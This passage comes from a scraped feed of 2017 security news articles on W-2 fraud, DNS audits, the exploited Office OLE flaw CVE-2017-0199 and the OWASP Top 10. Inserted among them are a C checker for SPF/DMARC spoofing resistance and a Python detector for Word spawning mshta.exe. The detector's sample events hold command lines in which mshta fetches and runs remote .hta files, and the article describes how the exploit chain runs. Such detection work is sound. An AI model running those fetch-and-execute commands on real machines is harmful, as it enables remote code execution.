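enum dmarc_p { DMARC_MISSING, DMARC_NONE, DMARC_QUARANTINE, DMARC_REJECT };

/* Qualifier on the terminal "all" mechanism: +all lets anyone send;
 * ~all and -all are the settings that make SPF useful to DMARC. */
enum spf_all spf_all_qualifier(const char *txt)
{
    char copy[512];
    if (!txt || strncmp(txt, "v=spf1", 6) != 0)
        return SPF_NO_ALL;
    snprintf(copy, sizeof copy, "%s", txt);
    for (char *tok = strtok(copy, " "); tok; tok = strtok(NULL, " ")) {
        char q = '+';                                /* default qualifier */
        if (*tok == '+' || *tok == '-' || *tok == '~' || *tok == '?')
            q = *tok++;
        if (strcmp(tok, "all") != 0)                 /* lowercase assumed */
            continue;
        switch (q) {
        case '-': return SPF_HARDFAIL;
        case '~': return SPF_SOFTFAIL;
        case '?': return SPF_NEUTRAL_ALL;
        default:  return SPF_PASS_ALL;
        }
    }
    return SPF_NO_ALL;   /* no terminal all (or only redirect=): unenforced here */
}

/* Policy tag of a DMARC record, plus pct= (default 100). Tags are split on ';'
 * and trimmed so that "sp=" (subdomain policy) is never mistaken for "p=". */
enum dmarc_p dmarc_policy(const char *txt, int *pct)
{
    char copy[512];
    enum dmarc_p p = DMARC_MISSING;
    *pct = 100;
    if (!txt || strncmp(txt, "v=DMARC1", 8) != 0)
        return DMARC_MISSING;
    snprintf(copy, sizeof copy, "%s", txt);
    for (char *tok = strtok(copy, ";"); tok; tok = strtok(NULL, ";")) {
        while (*tok == ' ' || *tok == '\t') tok++;
        size_t n = strlen(tok);
        while (n && (tok[n - 1] == ' ' || tok[n - 1] == '\t')) tok[--n] = '\0';
        if (strncmp(tok, "p=", 2) == 0) {
            const char *v = tok + 2;
            if      (strcmp(v, "reject") == 0)     p = DMARC_REJECT;
            else if (strcmp(v, "quarantine") == 0) p = DMARC_QUARANTINE;
            else if (strcmp(v, "none") == 0)       p = DMARC_NONE;
        } else if (strncmp(tok, "pct=", 4) == 0) {
            *pct = atoi(tok + 4);
        }
    }
    return p;   /* a v=DMARC1 record without p= is invalid: reported as missing */
}

/* Would a spoofed From: header for this domain be quarantined or rejected? */
bool domain_resists_spoofing(const char *spf_txt, const char *dmarc_txt, char *why, size_t cap)
{
    int pct;
    enum dmarc_p p = dmarc_policy(dmarc_txt, &pct);
    enum spf_all s = spf_all_qualifier(spf_txt);
    if (p == DMARC_MISSING) { snprintf(why, cap, "no DMARC record: spoofs are delivered"); return false; }
    if (p == DMARC_NONE)    { snprintf(why, cap, "DMARC p=none: monitoring only, spoofs still delivered"); return false; }
    if (pct < 100)          { snprintf(why, cap, "DMARC enforced on only %d%% of mail", pct); return false; }
    if (s == SPF_PASS_ALL)  { snprintf(why, cap, "SPF +all authorises any sender, so aligned spoofs pass"); return false; }
    snprintf(why, cap, "DMARC p=%s at 100%%", p == DMARC_REJECT ? "reject" : "quarantine");
    return true;
}

int main(void)
{
    /* constructed records for three hypothetical domains */
    const char *cases[][3] = {
        { "good.example", "v=spf1 include:_spf.example.net -all", "v=DMARC1; p=reject; rua=mailto:dmarc@good.example" },
        { "weak.example", "v=spf1 mx ~all",                       "v=DMARC1; p=none; rua=mailto:dmarc@weak.example" },
        { "bare.example", "v=spf1 a mx +all",                     NULL },
    };
    char why[128];
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        bool ok = domain_resists_spoofing(cases[i][1], cases[i][2], why, sizeof why);
        printf("%-13s %s (%s)\n", cases[i][0], ok ? "resists spoofing" : "SPOOFABLE", why);
    }
    return 0;
}
```

Feed it the live records (dig TXT example.com and dig TXT _dmarc.example.com) for your own domain: p=none is the usual finding, and it means a spoofed CEO email is reported to you after the fact rather than stopped.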

Although tax season may be coming to a close, phishing schemes aren’t slowing down. W-2 fraud is just one of the many tax scams to watch out for; check out 9 Phishing Lures that Could Hijack your 2017 Tax Refund for additional schemes to keep on your employees’ radar.


Stu Sjouwerman (pronounced “shower-man”) is the founder and CEO of KnowBe4,Inc., which hosts the world’s most popular integrated Security Awareness Training and Simulated Phishing platform. A data security expert with more than 30 years in the IT industry, Sjouwerman was the … View Full Bio

Article source: http://www.darkreading.com/endpoint/tax-season-surprise-w-2-fraud/a/d-id/1328595?_mc=RSS_DR_EDT

Forget the Tax Man: Time for a DNS Security Audit

Here’s a 5-step DNS security review process that’s not too scary and will help ensure your site availability and improve user experience.

Image Source: Adobe Stock

The DDoS attack against DNS provider Dyn that took out large swaths of the Internet put a million-candle spotlight on the issue of availability, and proved that proper DNS management is not just an IT issue, but a security mandate as well. Maintaining website availability and preventing revenue loss from associated outages depends upon good DNS hygiene, maintenance, and control.

DNS tends to be a set-and-forget type of technology… and that can pose problems several years after everything has been forgotten, according to Chris Roosenraad, director of product management for DNS service at Neustar.

Dark Reading caught up with several experts to discuss why it is important to regularly check on DNS configurations and how to begin the job.

Roosenraad — who has more than two decades of security, networking and public policy expertise, having previously developed the DNS architecture for Charter Communications and Time Warner Cable — says that DNS audits sound more foreboding than they actually are. This is not necessarily some big, scary compliance activity. It is just a way of accounting for all of the DNS infrastructure configuration to ensure that things haven’t gotten out of sync with changing business realities. 

“It’s just a process of taking some time away from the 30 other multitasking things that we all have in front of us to sit down and say, ‘Is this what I really want my Internet presence to be?'” he says.

How to begin the process? Here are five essential steps to conducting a successful DNS audit. 

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.

Article source: http://www.darkreading.com/cloud/forget-the-tax-man-time-for-a-dns-security-audit/d/d-id/1328604?_mc=RSS_DR_EDT

Microsoft Office Zero-Day Patched After Months of Attacks

Microsoft released a security update for a flaw in the OLE API that affects most versions of Microsoft Word.

Microsoft today patched a critical zero-day vulnerability in Microsoft Office/WordPad that attackers had been exploiting in the wild for months.

CVE-2017-0199 is a remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) application programming interface. The vulnerability already had been weaponized in attacks to distribute the Dridex banking Trojan, as a botnet payload, and in a cyber espionage campaign.

Security firm McAfee published a report on April 7 to warn users of an exploit that has been used to target users since late January. SophosLabs claims attacks actually date back to November 2016, with most occurring between March and April 2017.

There are a few reasons this bug is especially dangerous: it affects most, or all, Windows versions of Microsoft Word, and targets don’t have to enable macros for exploits to be effective, explains Bryan Burns, vice president of threat research and engineering at Proofpoint.

Burns says it’s a logic bug, which is harder to defend against. Victims are more likely to fall for these attacks because they aren’t prompted to enable macros — something businesses teach their employees to avoid. Instead, the attacks use a dialogue box.

“They’ve probably been trained over the last several years not to enable macros,” says Burns. “This is a different vector. Users haven’t seen a dialogue box. They haven’t been trained not to click on it.”

The attackers send emails with attached Microsoft Word RTF (Rich Text Format) documents. Subject lines read “Scan Data” and attachments are named “Scan_123456.doc” or “Scan_123456.pdf”, with “123456” replaced by random numbers, Proofpoint reports.

When launched, the exploit connects to a remote server, downloads a file containing HTML application content, and executes it as a .hta file, McAfee explains. Because .hta is executable, the attacker gains full code execution on the machine. After the malware has been installed, the exploit closes the bait Word document and displays a new one to show the victim.

The exploit uses an embedded OLE2link object in specially created documents.
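One way to detect the chain just described, added here and not taken from the article or any of the vendors quoted: HTML applications are run by mshta.exe on Windows, so a Word or WordPad process spawning mshta.exe with a URL on its command line is a strong signal of the downloaded-.hta step. The event layout and the sample events are constructed for this example.

```python
"""Flag Office or WordPad processes that launch mshta.exe, the Windows host for
.hta content, which is how the chain described above executes the downloaded
HTML application. Added example; the events below are constructed and the CSV
layout is an assumption, not the format of any particular EDR or Sysmon feed."""
import csv
import io

OFFICE_PARENTS = {"winword.exe", "wordpad.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe"}

# Constructed process-creation events (TEST-NET addresses, made-up paths)
SAMPLE_EVENTS = r"""ts,parent_image,image,command_line
2017-04-11T09:12:01Z,C:\Program Files\Microsoft Office\Office15\WINWORD.EXE,C:\Windows\System32\mshta.exe,mshta.exe http://198.51.100.7/template.hta
2017-04-11T09:12:05Z,C:\Windows\explorer.exe,C:\Program Files\Microsoft Office\Office15\WINWORD.EXE,WINWORD.EXE /n Scan_482913.doc
2017-04-11T09:13:40Z,C:\Windows\explorer.exe,C:\Windows\System32\mshta.exe,mshta.exe C:\Tools\inventory.hta
2017-04-11T09:14:02Z,C:\Windows\System32\wordpad.exe,C:\Windows\System32\mshta.exe,mshta.exe http://203.0.113.9/x.hta
"""

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(csv_text):
    """Return (ts, parent, child, remote) for each Office/WordPad -> script host
    launch; remote is True when the command line points at a URL, i.e. the HTA
    is being fetched from a server rather than opened from disk."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        parent, child = basename(row["parent_image"]), basename(row["image"])
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            cmd = row["command_line"].lower()
            remote = "http://" in cmd or "https://" in cmd
            hits.append((row["ts"], parent, child, remote))
    return hits

if __name__ == "__main__":
    for ts, parent, child, remote in detect(SAMPLE_EVENTS):
        print(f"{ts} ALERT {parent} spawned {child}" + (" fetching remote HTA" if remote else ""))
```

The explorer.exe-launched mshta.exe in the sample is deliberately not flagged: the signal is the parent process, not mshta.exe on its own.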

“Everything is working as designed,” says Burns of how the attack deceives targets. “But the way it’s designed, it left a corner open so code can run when you wouldn’t expect it to be running.”

In the case of Dridex, attackers obtained full system control to launch the banking Trojan malware. This enabled them to grab businesses’ financial credentials and intercept transactions to steal money. “In this case, it was financially motivated,” says Burns of the attackers’ goals. “They were trying to infect with this malware to empty out [organizations’] bank accounts.”

But Burns warns that this Office flaw would allow for any type of malware to be installed. Ransomware is one example Proofpoint sees frequently distributed.

“We would expect any threat actor who is trying to attack businesses to try this technique,” he cautions.

Several security firms aside from Proofpoint observed this vulnerability in the wild ahead of Microsoft’s patch. Netskope’s Threat Research Labs linked this zero-day to the Godzilla botnet loader. Researchers saw IPs related to the botnet loader serving payloads tied to exploits for the vulnerability using malicious Word documents.

In a different scenario, FireEye spotted this flaw being used in a cyber espionage campaign targeting Russian-speaking victims since January 2017 and installing FINSPY, a tool previously associated with the “lawful intercept” company Gamma Group. FireEye in another case saw exploits installing Latentbot, a malware family used by cybercriminals for financial gain.

Now that Microsoft has issued a fix, businesses should protect themselves by patching as quickly as possible, Burns says. He also cautions organizations to be wary of these types of attacks, as email is the “dominant threat vector” hackers will use to infect businesses.

Meanwhile, today is the last day of extended support for Windows Vista. The OS will no longer receive updates or support from Microsoft. 

Kelly is an associate editor for InformationWeek. She most recently reported on financial tech for Insurance Technology, before which she was a staff writer for InformationWeek and InformationWeek Education. When she’s not catching up on the latest in tech, Kelly enjoys …

Article source: http://www.darkreading.com/vulnerabilities---threats/microsoft-office-zero-day-patched-after-months-of-attacks/d/d-id/1328607?_mc=RSS_DR_EDT

OWASP Top 10 Update: Long Overdue Or Same-Old, Same-Old?

The industry benchmark list is about to change for the first time in four years, but barring a few important changes, it looks a lot like it always has.

After a four-year hiatus, OWASP this week released a working draft of the latest iteration of its OWASP Top 10 vulnerabilities list.

Security leaders welcome some vital changes to the list – namely the addition of application programming interfaces (APIs) – that acknowledge shifts in the development and threat landscape, with hopes that these types of changes would be made more frequently in the future. Others note that in many ways the list looks very similar to previous incarnations. And some say that’s a testament to the need for developer practices – not the list itself – to more rapidly evolve.

A staple benchmark of the application security world, the OWASP Top 10 was designed to help developers avoid common coding bugs and provide security teams some standards for prioritizing vulnerability mitigation. It often sets the tone for enterprise application security program priorities and is also found at the root of many vulnerability testing product-scoring mechanisms and prioritization algorithms. 

“To me, the 2017 Top 10 reflects the move towards modern, high-speed software development that we’ve seen explode across the industry since the last version of the Top 10 in 2013,” says Jeff Williams, CTO of Contrast Security and one of the key authors of the list since it was first developed in 2003. “While many of the vulnerabilities remain the same, the addition of APIs and attack protection should focus organizations on the key issues for modern software.”

According to Kunal Anand, CTO and co-founder of Prevoty, the inclusion of APIs is probably the most meaningful change in this go-around. It’s an important addition that addresses the way enterprises operate in this day and age of microservices-enabled DevOps and Agile shops.

“Enterprises across many industries, including finance and retail, are deconstructing large monolithic applications into smaller leaner services and micro-services. It’s common for an average application to make dozens of API calls to render a single page, with many of the calls distributed across different services,” he says. “APIs are ultimately applications, albeit more focused. In 2016, we started to see very targeted attacks against API frameworks. I suspect we’ll see a continuation of that in 2017.”

This new addition could potentially help raise more awareness about API security, which is largely ignored at most organizations today, says Ryan O’Leary, vice president of WhiteHat Security’s Threat Research Center.

“This is a great change and really speaks to the changing dynamic of how we develop applications and build them for modern consumption,” he says.

Having said that, both Anand and O’Leary believe that the Top 10 list isn’t evolving quickly enough to keep up with the pace of change in how software is delivered and in threat patterns.

“I’d like to see an increased cadence when it comes to updating the OWASP Top 10. The Internet, and more specifically applications, looked a lot different in 2013. In our industry, it’s possible to see big changes in just a couple of years,” says Anand, who sees trends like serverless-based technologies, containerization and mobile development frameworks like React all changing the game to the point where they’ll need to be addressed in the near future. “I hope we can update OWASP to cover these large trends and changes more frequently.”

To be fair, though, in many ways the major problems in applications have remained fairly static over the last 14 years.

“We have added and removed a few items over the years, but this year’s list is very similar to what we released in 2003,” says Williams.

In a lot of ways, the OWASP Top 10 pretty well illustrates appsec’s prevailing trend of the more things change, the more they stay the same, says Ben Tomhave, principal security scientist for New Context Services.

“There’s no point in producing a new list every year, because – as demonstrated by the high degree of similarity between recent versions – things simply don’t change that quickly,” he says. “The strong similarities between the 2017 Top 10 list and previous iterations suggest that current approaches to developer awareness and education aren’t working. We clearly have a long way to go, and likely need to change tactics to achieve better outcomes.”

And, in fact, one of the other changes that was made this time around kind of acknowledges that, O’Leary says.

“OWASP is now stating that companies need to have some sort of WAF or RASP technology to detect, respond, and patch. This is going to be a controversial one as it’s a mitigation to a vulnerability and not a vulnerability in itself,” he says. “The OWASP list has typically been focused around vulnerabilities and how to fix or protect against those threats. With this change OWASP is now saying that a 3rd party service or tool is needed. This is likely a result of how slow the industry is to fix vulnerabilities.”

He believes the new inclusion will be a hot button topic for a long time to come.

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.

Article source: http://www.darkreading.com/application-security/owasp-top-10-update-long-overdue-or-same-old-same-old/d/d-id/1328608?_mc=RSS_DR_EDT